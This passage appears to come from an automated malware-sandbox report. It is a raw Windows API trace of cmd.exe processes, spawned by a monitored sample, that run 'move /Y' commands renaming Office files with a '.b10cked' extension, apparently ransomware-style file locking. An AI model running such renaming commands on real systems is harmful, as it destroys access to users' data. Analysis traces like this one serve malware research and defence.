_String2="Path=C:", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.212] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.213] _wcsicmp (_String1="GRINTL~1.TRX", _String2=".") returned 57 [0153.213] _wcsicmp (_String1="GRINTL~1.TRX", _String2="..") returned 57 [0153.213] GetFileAttributesW 
(lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl~1.trx")) returned 0x2020 [0153.213] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4f1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.213] SetErrorMode (uMode=0x0) returned 0x0 [0153.213] SetErrorMode (uMode=0x1) returned 0x0 [0153.213] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2eeb54, lpFilePart=0x2eeb3c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", lpFilePart=0x2eeb3c*="GRINTL~1.TRX") returned 0x3c [0153.213] SetErrorMode (uMode=0x0) returned 0x1 [0153.213] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.213] _wcsicmp (_String1="GRINTL~1.TRX", _String2=".") returned 57 [0153.213] _wcsicmp (_String1="GRINTL~1.TRX", _String2="..") returned 57 [0153.213] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl~1.trx")) returned 0x2020 [0153.214] SetErrorMode (uMode=0x0) returned 0x0 [0153.214] SetErrorMode (uMode=0x1) returned 0x0 [0153.214] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x2eefd0, lpFilePart=0x2eed68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", lpFilePart=0x2eed68*="GRINTL~1.TRX") returned 0x3c [0153.214] SetErrorMode (uMode=0x0) returned 0x1 [0153.214] SetErrorMode (uMode=0x0) returned 0x0 [0153.214] SetErrorMode (uMode=0x1) returned 0x0 [0153.214] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ef1d8, lpFilePart=0x2eed68 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked", lpFilePart=0x2eed68*="GRINTL32.DLL.trx_dll.b10cked") returned 0x4c [0153.214] SetErrorMode (uMode=0x0) returned 0x1 [0153.214] SetLastError (dwErrCode=0x0) [0153.214] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.dll.trx_dll.b10cked")) returned 0xffffffff [0153.214] GetLastError () returned 0x2 [0153.214] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ee6e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee6e4) returned 0x4f2130 [0153.214] FindNextFileW (in: hFindFile=0x4f2130, lpFindFileData=0x2ee6e4 | out: lpFindFileData=0x2ee6e4) returned 0 [0153.215] GetLastError () returned 0x12 [0153.215] FindClose (in: hFindFile=0x4f2130 | out: hFindFile=0x4f2130) returned 1 [0153.216] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x4f1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4f1cc0) returned 0x4f2130 [0153.217] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ee97c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0153.217] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x2ee97c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0153.217] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.dll.trx_dll")) returned 0x2020 [0153.217] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.217] FindClose (in: hFindFile=0x4f2130 | out: hFindFile=0x4f2130) returned 1 [0153.217] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ee930 | out: _Buffer=" 1") returned 9 [0153.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.217] GetFileType (hFile=0x7) returned 0x2 [0153.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.218] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ee8bc | out: lpMode=0x2ee8bc) returned 1 [0153.218] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.218] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ee8f0 | out: lpConsoleScreenBufferInfo=0x2ee8f0) returned 1 [0153.218] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.218] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ee930 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.218] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x2ee914, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ee914*=0x1a) returned 1 [0153.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.219] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.219] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.219] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.219] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.219] SetConsoleInputExeNameW () returned 0x1 [0153.219] GetConsoleOutputCP () returned 0x1b5 [0153.219] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.219] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.219] exit (_Code=0) Process: id = "252" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xddc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20663 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20664 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20665 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20666 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 20667 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20668 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20669 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20670 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20671 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 20672 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20703 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20704 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20705 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = 
"" Region: id = 20706 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 20707 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20708 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20709 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20710 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20711 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20712 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20713 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20714 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20715 start_va 
= 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20716 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20717 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 20718 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20719 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20720 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 20721 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 20722 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 20723 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 20724 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 20725 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 20726 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001100000" filename = "" Thread: id = 315 os_tid = 0xd9c [0153.166] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f7fc | out: lpSystemTimeAsFileTime=0x18f7fc*(dwLowDateTime=0x9539b200, dwHighDateTime=0x1d440a9)) [0153.166] GetCurrentProcessId () returned 0xddc [0153.166] GetCurrentThreadId () returned 0xd9c [0153.166] GetTickCount () returned 0x2f334 [0153.166] QueryPerformanceCounter (in: lpPerformanceCount=0x18f7f4 | out: lpPerformanceCount=0x18f7f4*=20995562322) returned 1 [0153.167] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.167] __set_app_type (_Type=0x1) [0153.167] __p__fmode () returned 0x76b331f4 [0153.167] __p__commode () returned 0x76b331fc [0153.167] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.167] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.167] GetCurrentThreadId () returned 0xd9c [0153.167] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd9c) returned 0x38 [0153.168] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.168] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.168] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.172] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.172] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f78c | out: phkResult=0x18f78c*=0x0) returned 0x2 [0153.172] VirtualQuery (in: lpAddress=0x18f7c3, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.172] VirtualQuery (in: 
lpAddress=0x90000, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.172] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.172] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.172] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f75c, dwLength=0x1c | out: lpBuffer=0x18f75c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.172] GetConsoleOutputCP () returned 0x1b5 [0153.172] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.172] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.172] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.172] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.173] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.173] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.173] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.173] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.173] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.173] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.173] GetEnvironmentStringsW () returned 0x1c0218* [0153.174] FreeEnvironmentStringsW 
(penv=0x1c0218) returned 1 [0153.174] GetEnvironmentStringsW () returned 0x1c0218* [0153.174] FreeEnvironmentStringsW (penv=0x1c0218) returned 1 [0153.174] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e6fc | out: phkResult=0x18e6fc*=0x40) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0xa8, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x1, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x1, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x0, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x40, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x40, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x40, 
lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegCloseKey (hKey=0x40) returned 0x0 [0153.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e6fc | out: phkResult=0x18e6fc*=0x40) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x40, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x1, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x1, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x0, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x9, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x4, lpData=0x18e708*=0x9, lpcbData=0x18e700*=0x4) returned 0x0 [0153.174] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e704, lpData=0x18e708, lpcbData=0x18e700*=0x1000 | out: lpType=0x18e704*=0x0, lpData=0x18e708*=0x9, lpcbData=0x18e700*=0x1000) returned 0x2 [0153.174] RegCloseKey (hKey=0x40) 
returned 0x0 [0153.174] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637b [0153.174] srand (_Seed=0x5b88637b) [0153.174] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"" [0153.174] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked\"" [0153.175] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.175] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1c1978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.175] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.175] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.175] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.175] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.175] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.175] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.175] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.175] _wcsicmp 